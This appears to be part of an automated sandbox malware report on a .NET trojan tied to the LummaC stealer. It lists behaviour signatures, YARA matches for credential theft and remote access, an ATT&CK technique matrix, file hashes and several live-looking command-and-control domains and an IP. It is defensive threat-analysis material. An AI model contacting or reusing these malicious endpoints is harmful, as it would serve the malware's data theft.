            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeQueries volume information: C:\Users\user\Desktop\FoS5cjKhd3.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            411
            Process Injection
            1
            Masquerading
            OS Credential Dumping21
            Security Software Discovery
            Remote Services1
            Screen Capture
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory41
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell
            Logon Script (Windows)Logon Script (Windows)41
            Virtualization/Sandbox Evasion
            Security Account Manager22
            System Information Discovery
            SMB/Windows Admin Shares2
            Clipboard Data
            113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
            Process Injection
            NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information
            LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
            Obfuscated Files or Information
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            FoS5cjKhd3.exe61%ReversingLabsByteCode-MSIL.Trojan.Zilla
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://upx.sf.net0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            gutterydhowi.shop
            104.21.4.136
            truetrue
              unknown
              lootebarrkeyn.shop
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                fragnantbui.shoptrue
                  unknown
                  lootebarrkeyn.shoptrue
                    unknown
                    gutterydhowi.shoptrue
                      unknown
                      offensivedzvju.shoptrue
                        unknown
                        https://gutterydhowi.shop/apitrue
                          unknown
                          drawzhotdog.shoptrue
                            unknown
                            ghostreedmnu.shoptrue
                              unknown
                              reinforcenh.shoptrue
                                unknown
                                stogeneratmns.shoptrue
                                  unknown
                                  vozmeatillu.shoptrue
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://gutterydhowi.shop/apiCRegAsm.exe, 00000003.00000002.2264764815.0000000000DCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://gutterydhowi.shop/apiMRegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://upx.sf.netAmcache.hve.7.drfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://gutterydhowi.shop/RegAsm.exe, 00000003.00000002.2264764815.0000000000DCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.cloudflare.com/learning/acceRegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            104.21.4.136
                                            gutterydhowi.shopUnited States
                                            13335CLOUDFLARENETUStrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1520608
                                            Start date and time:2024-09-27 16:46:12 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 5m 6s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:13
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:FoS5cjKhd3.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:3b2250172cdc65f249533ad138ef8ab5.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@6/7@2/1
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 95%
                                            • Number of executed functions: 17
                                            • Number of non-executed functions: 53
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: FoS5cjKhd3.exe
                                            TimeTypeDescription
                                            10:47:10API Interceptor2x Sleep call for process: RegAsm.exe modified
                                            10:47:16API Interceptor1x Sleep call for process: WerFault.exe modified
                                            16:47:01Task SchedulerRun new task: {CB07D4C7-CA40-4A7C-819D-75C894487DC6} path: .
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            104.21.4.136file.exeGet hashmaliciousLummaCBrowse
                                              kewyIO69TI.exeGet hashmaliciousLummaCBrowse
                                                gZzI6gTYn4.exeGet hashmaliciousLummaCBrowse
                                                  file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                    file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                            SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeGet hashmaliciousLummaCBrowse
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                gutterydhowi.shopfile.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                kewyIO69TI.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                gZzI6gTYn4.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                U6b3tLFqN5.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.132.32
                                                                0UB3FIL25c.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.132.32
                                                                file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                • 104.21.4.136
                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                • 172.67.132.32
                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                • 172.67.132.32
                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                • 104.21.4.136
                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                • 104.21.4.136
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                • 172.67.162.108
                                                                https://www.google.fr/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fcasaderestauraciononline.com%2Fholy%2Findexsyn1.html%23cmltYS5hbWV1ckBjYXRhbGluYW1hcmtldGluZy5mcg==Get hashmaliciousHTMLPhisherBrowse
                                                                • 188.114.96.3
                                                                0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                https://changeofscene.ladesk.com/605425-Secure-Business-DocumenGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.24.14
                                                                https://careeligibility.vercel.app/chubedanGet hashmaliciousHTMLPhisherBrowse
                                                                • 172.67.75.166
                                                                https://clicktracking.yellowbook.com/trackinguserwebapp/tracking.html?MB_ID=256862&SE_ID=9&AG_ID=2952701&AD_ID=6851395&kw=restaurants%20near%20me&kw_type=p&C_ID=874339&SE_AD_ID=73873744870314&se_clk_id=0651300f23401ca1b2e355991fb49377&hibu_site=0&redirect_url=https://femalewhowork.sa.com/rUswT/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                https://lkk6m.conownsup.com/tpgbE/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                SecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.140.92
                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.140.92
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                • 104.21.4.136
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                bfINGx7hvL.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                kewyIO69TI.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                bfINGx7hvL.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                gZzI6gTYn4.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                U6b3tLFqN5.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                FACTORY NEW PURCHASE ORDER.docGet hashmaliciousUnknownBrowse
                                                                • 104.21.4.136
                                                                Dev_Project.xlsGet hashmaliciousUnknownBrowse
                                                                • 104.21.4.136
                                                                Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                • 104.21.4.136
                                                                No context
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):65536
                                                                Entropy (8bit):1.0954646420210803
                                                                Encrypted:false
                                                                SSDEEP:192:yBKTeFy/A+d/0BU/AjezEKv6+zuiFeZ24IO8Z:QOA+dsBU/AjeBFzuiFeY4IO8Z
                                                                MD5:114DA399F8A3BB25664F749BD4659449
                                                                SHA1:A5A93AC3D7BAA6372B16FE08FB6D7861EB6C88CF
                                                                SHA-256:BC037B40B5A552196821BE90CB77BCF78B974B38DFD7AAC17C9512838DCFA08A
                                                                SHA-512:0AEB25DD537CD50FF962A7A31F43F55FC17B78BD9D1F4768D4F2121A31C41910609B636D60D11163B79A7774BA0795F34714432E79988384582F9A8A310BBDE7
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.9.2.2.0.3.3.4.6.0.9.6.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.9.2.2.0.3.4.0.3.9.0.9.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.3.7.5.b.0.f.-.a.4.4.2.-.4.b.c.e.-.a.5.f.6.-.0.4.0.8.d.3.5.4.2.5.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.5.2.3.6.f.7.e.-.4.e.6.4.-.4.c.3.3.-.b.f.e.d.-.9.d.f.1.1.0.4.5.3.e.9.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.e.0.-.0.0.0.1.-.0.0.1.5.-.b.e.a.a.-.d.2.2.1.e.c.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:Mini DuMP crash report, 15 streams, Fri Sep 27 14:47:13 2024, 0x1205a4 type
                                                                Category:dropped
                                                                Size (bytes):114106
                                                                Entropy (8bit):2.0672613676723275
                                                                Encrypted:false
                                                                SSDEEP:384:6cI9rEf5HnRXA7OEAB4Wl9FUOB1zypJSeG+aljljMR:DIJa5nC7fWdjSGzLw
                                                                MD5:2648EDEC6909B180632674344210A5C9
                                                                SHA1:DF1E24B5D45040AC1EF7EE2B846329CF560EF421
                                                                SHA-256:97826F346931BEF6625D1ABDD5E4E9307C172A254BB579FFE6BDE5AE2CFA92D0
                                                                SHA-512:49134A58FC16513926F78E42E1263AD888D79D0F4780DDF9AD729D085138A8A4D655E7A982385F6A8F28F49E9B705E42F5DEB025929D3D0464FD93620523323F
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:MDMP..a..... .......q..f....................................T...|%...........L..........`.......8...........T............D...x...........%...........'..............................................................................eJ......T(......GenuineIntel............T...........n..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):6290
                                                                Entropy (8bit):3.723809236009733
                                                                Encrypted:false
                                                                SSDEEP:96:RSIU6o7wVetbob6pY2QE/6ii5aM4UW89bOSsf9am:R6l7wVeJob6pY22prW89bOSsf9am
                                                                MD5:787377886C867D498192A5CAF55AD39C
                                                                SHA1:E854C4C7EB6E0BC3810202EE16ACD925F8E9D2AD
                                                                SHA-256:F9641654E20036EC7B86B6329867DC4E2050033364967D876DEB845170EC9B40
                                                                SHA-512:64C4B071202A89983A9093EC579906478157DBC104857AE8A407EE4563A8C9DF587AEAB85D4D093603252F93EC343C168665A23C666955A14BE2E6F93A894E8D
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.4.4.<./.P.i.
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):4628
                                                                Entropy (8bit):4.448882349783517
                                                                Encrypted:false
                                                                SSDEEP:96:uIjf4I7iS7VDfyJfuDlV+tvJ9t5TBukukrd:uI0YiS7lenTghY
                                                                MD5:26D437902AC6C050FEDD8684307F0443
                                                                SHA1:7D65A2355554BC79794EBF9D1E5F82DEC552ED37
                                                                SHA-256:80FE5083ADB7091F39964889F37823CBE44BC663BC8666B3E99489ED0E359743
                                                                SHA-512:739B160FF16065FF50D520618781963A72F05F7C57C8AC333E0A11F4592DA301F39D46AFE62D475BAD99BD3798CE9F07A58DFCF12DC156EDF270913567DF8030
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="518749" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                Process:C:\Users\user\Desktop\FoS5cjKhd3.exe
                                                                File Type:CSV text
                                                                Category:modified
                                                                Size (bytes):425
                                                                Entropy (8bit):5.353683843266035
                                                                Encrypted:false
                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                Category:dropped
                                                                Size (bytes):1835008
                                                                Entropy (8bit):4.469492474221903
                                                                Encrypted:false
                                                                SSDEEP:6144:RzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNqjDH5S:JZHtYZWOKnMM6bFpQj4
                                                                MD5:928D17460F29B55233ACED9DD5DA5A24
                                                                SHA1:AADE2987F67A1B17B72190AA31B5254E62AC7726
                                                                SHA-256:DEB997142DE9C309E68A37D5652B0916C6288883A8DC2870302A593AE1BAFB67
                                                                SHA-512:B2A1B2B01E9E394D86FD1F2528BB744D0933B7ED3669D6E90513A9AFAF12733708C068EB4B4DAD9753767BCEC641E7DD31D17F0AE637BF4131F1079BDD397698
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..#...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\FoS5cjKhd3.exe
                                                                File Type:ASCII text, with CRLF, LF line terminators
                                                                Category:dropped
                                                                Size (bytes):33
                                                                Entropy (8bit):2.2845972159140855
                                                                Encrypted:false
                                                                SSDEEP:3:i6vvRyMivvRya:iKvHivD
                                                                MD5:45B4C82B8041BF0F9CCED0D6A18D151A
                                                                SHA1:B4DAD3FFFEF507CBB78671EE620BB495F8CE22F1
                                                                SHA-256:7CFA461ED1FC8611AB74878EDB1FBBDE3596F5D042946A42A7F31EB6D462E628
                                                                SHA-512:B29C3696A8A311EFAF9B9709BA082FF2C8D45A6912D79BC1DE7FEEFBEF8F8DDEFCD6650B5E1165D0A79800C8AED399E2B11BC2431E3837DD8587516BDE50EAB5
                                                                Malicious:false
                                                                Preview:0..1..2..3..4..0..1..2..3..4.....
                                                                File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.9892026359969215
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:FoS5cjKhd3.exe
                                                                File size:375'296 bytes
                                                                MD5:3b2250172cdc65f249533ad138ef8ab5
                                                                SHA1:70d66ee841754f39e7abffeb8f980be3f1e50033
                                                                SHA256:1622822b3f7f66537240b4760560550654eb2c23c1f57c7e4bb52d3cbc5edd5e
                                                                SHA512:d84c97d55e09a2b82fc376678c133bfab49a01557891d5a85dc284da7e981df7ff0bf77bb98951b71d3eca4ef25d9819cb6ad85ff75afaf0c4da0e80d71e461c
                                                                SSDEEP:6144:zhhct8bwd3MYhdPGRfvsaFP2s2k5yR7261AuXBAnRhCFiVBLbb/g3ipkai080i:b1bwlMUPGlvlP/2kER72eAuXinRhaMXN
                                                                TLSH:9884234A3AD08763F4F5C6B28CB596A48F313F7BC98DE27BB1119E79125AD0593B0C14
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ........@.. ....................... ............`................................
                                                                Icon Hash:00928e8e8686b000
                                                                Entrypoint:0x45ce3e
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows cui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x66F691DC [Fri Sep 27 11:07:08 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
